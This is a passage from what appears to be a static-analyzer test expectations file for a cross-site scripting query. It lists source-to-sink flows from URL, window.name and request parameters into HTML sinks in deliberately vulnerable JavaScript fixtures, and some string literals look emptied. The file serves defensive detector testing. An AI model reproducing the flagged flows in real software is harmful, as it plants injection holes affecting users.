    ' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

    ' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | -| jquery.js:7:5:7:34 | "
    " | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
    " | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | -| jquery.js:14:19:14:58 | decodeU ... n.hash) | jquery.js:14:38:14:57 | window.location.hash | jquery.js:14:19:14:58 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | jquery.js:14:38:14:57 | window.location.hash | user-provided value | -| jquery.js:15:19:15:60 | decodeU ... search) | jquery.js:15:38:15:59 | window. ... .search | jquery.js:15:19:15:60 | decodeU ... search) | Cross-site scripting vulnerability due to $@. | jquery.js:15:38:15:59 | window. ... .search | user-provided value | -| jquery.js:16:19:16:64 | decodeU ... ring()) | jquery.js:16:38:16:52 | window.location | jquery.js:16:19:16:64 | decodeU ... ring()) | Cross-site scripting vulnerability due to $@. | jquery.js:16:38:16:52 | window.location | user-provided value | -| jquery.js:21:5:21:21 | hash.substring(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:21:5:21:21 | hash.substring(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:22:5:22:25 | hash.su ... (1, 10) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:22:5:22:25 | hash.su ... (1, 10) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:23:5:23:18 | hash.substr(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:23:5:23:18 | hash.substr(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:24:5:24:17 | hash.slice(1) | jquery.js:18:14:18:33 | window.location.hash | jquery.js:24:5:24:17 | hash.slice(1) | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:27:5:27:25 | hash.re ... #', '') | jquery.js:18:14:18:33 | window.location.hash | jquery.js:27:5:27:25 | hash.re ... #', '') | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:28:5:28:43 | window. ... ?', '') | jquery.js:28:5:28:26 | window. ... .search | jquery.js:28:5:28:43 | window. ... ?', '') | Cross-site scripting vulnerability due to $@. | jquery.js:28:5:28:26 | window. ... .search | user-provided value | -| jquery.js:34:5:34:25 | '' + ... '' | jquery.js:18:14:18:33 | window.location.hash | jquery.js:34:5:34:25 | '' + ... '' | Cross-site scripting vulnerability due to $@. | jquery.js:18:14:18:33 | window.location.hash | user-provided value | -| jquery.js:36:25:36:31 | tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:36:25:36:31 | tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | -| json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | -| nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | -| optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:17:20:17:20 | x | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:17:20:17:20 | x | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:32:18:32:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:32:18:32:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:36:18:36:25 | tainted2 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:36:18:36:25 | tainted2 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:39:18:39:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:39:18:39:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:43:18:43:25 | tainted3 | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:43:18:43:25 | tainted3 | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| optionalSanitizer.js:45:18:45:56 | sanitiz ... target | optionalSanitizer.js:26:16:26:39 | documen ... .search | optionalSanitizer.js:45:18:45:56 | sanitiz ... target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:26:16:26:39 | documen ... .search | user-provided value | -| pages/[id].jsx:10:44:10:45 | id | pages/[id].jsx:5:18:5:29 | router.query | pages/[id].jsx:10:44:10:45 | id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:5:18:5:29 | router.query | user-provided value | -| pages/[id].jsx:13:44:13:52 | params.id | pages/[id].jsx:25:11:25:24 | context.params | pages/[id].jsx:13:44:13:52 | params.id | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:25:11:25:24 | context.params | user-provided value | -| pages/[id].jsx:16:44:16:51 | params.q | pages/[id].jsx:26:10:26:22 | context.query | pages/[id].jsx:16:44:16:51 | params.q | Cross-site scripting vulnerability due to $@. | pages/[id].jsx:26:10:26:22 | context.query | user-provided value | -| react-native.js:8:18:8:24 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:18:8:24 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-native.js:9:27:9:33 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:9:27:9:33 | tainted | Cross-site scripting vulnerability due to $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value | -| react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | react-use-context.js:10:22:10:32 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:10:22:10:32 | window.name | user-provided value | -| react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | react-use-context.js:16:26:16:36 | window.name | Cross-site scripting vulnerability due to $@. | react-use-context.js:16:26:16:36 | window.name | user-provided value | -| react-use-router.js:8:21:8:39 | router.query.foobar | react-use-router.js:8:21:8:32 | router.query | react-use-router.js:8:21:8:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:8:21:8:32 | router.query | user-provided value | -| react-use-router.js:11:24:11:42 | router.query.foobar | react-use-router.js:11:24:11:35 | router.query | react-use-router.js:11:24:11:42 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:11:24:11:35 | router.query | user-provided value | -| react-use-router.js:23:43:23:61 | router.query.foobar | react-use-router.js:23:43:23:54 | router.query | react-use-router.js:23:43:23:61 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:23:43:23:54 | router.query | user-provided value | -| react-use-router.js:33:21:33:39 | router.query.foobar | react-use-router.js:33:21:33:32 | router.query | react-use-router.js:33:21:33:39 | router.query.foobar | Cross-site scripting vulnerability due to $@. | react-use-router.js:33:21:33:32 | router.query | user-provided value | -| react-use-state.js:5:51:5:55 | state | react-use-state.js:4:38:4:48 | window.name | react-use-state.js:5:51:5:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:4:38:4:48 | window.name | user-provided value | -| react-use-state.js:11:51:11:55 | state | react-use-state.js:10:14:10:24 | window.name | react-use-state.js:11:51:11:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:10:14:10:24 | window.name | user-provided value | -| react-use-state.js:17:51:17:55 | state | react-use-state.js:16:20:16:30 | window.name | react-use-state.js:17:51:17:55 | state | Cross-site scripting vulnerability due to $@. | react-use-state.js:16:20:16:30 | window.name | user-provided value | -| react-use-state.js:23:35:23:38 | prev | react-use-state.js:25:20:25:30 | window.name | react-use-state.js:23:35:23:38 | prev | Cross-site scripting vulnerability due to $@. | react-use-state.js:25:20:25:30 | window.name | user-provided value | -| sanitiser.js:23:21:23:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:23:21:23:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:30:21:30:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:30:21:30:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:33:21:33:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:33:21:33:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:38:21:38:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:38:21:38:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:45:21:45:44 | '' + ... '' | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:45:21:45:44 | '' + ... '' | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| sanitiser.js:48:19:48:46 | tainted ... /g, '') | sanitiser.js:16:17:16:27 | window.name | sanitiser.js:48:19:48:46 | tainted ... /g, '') | Cross-site scripting vulnerability due to $@. | sanitiser.js:16:17:16:27 | window.name | user-provided value | -| stored-xss.js:5:20:5:52 | session ... ssion') | stored-xss.js:2:39:2:62 | documen ... .search | stored-xss.js:5:20:5:52 | session ... ssion') | Cross-site scripting vulnerability due to $@. | stored-xss.js:2:39:2:62 | documen ... .search | user-provided value | -| stored-xss.js:8:20:8:48 | localSt ... local') | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:8:20:8:48 | localSt ... local') | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | -| stored-xss.js:12:20:12:54 | "" | stored-xss.js:3:35:3:58 | documen ... .search | stored-xss.js:12:20:12:54 | "" | Cross-site scripting vulnerability due to $@. | stored-xss.js:3:35:3:58 | documen ... .search | user-provided value | -| string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | string-manipulations.js:3:16:3:32 | document.location | Cross-site scripting vulnerability due to $@. | string-manipulations.js:3:16:3:32 | document.location | user-provided value | -| string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | string-manipulations.js:4:16:4:37 | documen ... on.href | Cross-site scripting vulnerability due to $@. | string-manipulations.js:4:16:4:37 | documen ... on.href | user-provided value | -| string-manipulations.js:5:16:5:47 | documen ... lueOf() | string-manipulations.js:5:16:5:37 | documen ... on.href | string-manipulations.js:5:16:5:47 | documen ... lueOf() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:5:16:5:37 | documen ... on.href | user-provided value | -| string-manipulations.js:6:16:6:43 | documen ... f.sup() | string-manipulations.js:6:16:6:37 | documen ... on.href | string-manipulations.js:6:16:6:43 | documen ... f.sup() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:6:16:6:37 | documen ... on.href | user-provided value | -| string-manipulations.js:7:16:7:51 | documen ... rCase() | string-manipulations.js:7:16:7:37 | documen ... on.href | string-manipulations.js:7:16:7:51 | documen ... rCase() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:7:16:7:37 | documen ... on.href | user-provided value | -| string-manipulations.js:8:16:8:48 | documen ... mLeft() | string-manipulations.js:8:16:8:37 | documen ... on.href | string-manipulations.js:8:16:8:48 | documen ... mLeft() | Cross-site scripting vulnerability due to $@. | string-manipulations.js:8:16:8:37 | documen ... on.href | user-provided value | -| string-manipulations.js:9:16:9:58 | String. ... n.href) | string-manipulations.js:9:36:9:57 | documen ... on.href | string-manipulations.js:9:16:9:58 | String. ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:9:36:9:57 | documen ... on.href | user-provided value | -| string-manipulations.js:10:16:10:45 | String( ... n.href) | string-manipulations.js:10:23:10:44 | documen ... on.href | string-manipulations.js:10:16:10:45 | String( ... n.href) | Cross-site scripting vulnerability due to $@. | string-manipulations.js:10:23:10:44 | documen ... on.href | user-provided value | -| tainted-url-suffix-arguments.js:6:22:6:22 | y | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | tainted-url-suffix-arguments.js:6:22:6:22 | y | Cross-site scripting vulnerability due to $@. | tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | user-provided value | -| tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | -| tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | -| tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | -| trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | -| trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | -| tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:5:26:5:31 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:5:26:5:31 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... .search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... .search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| 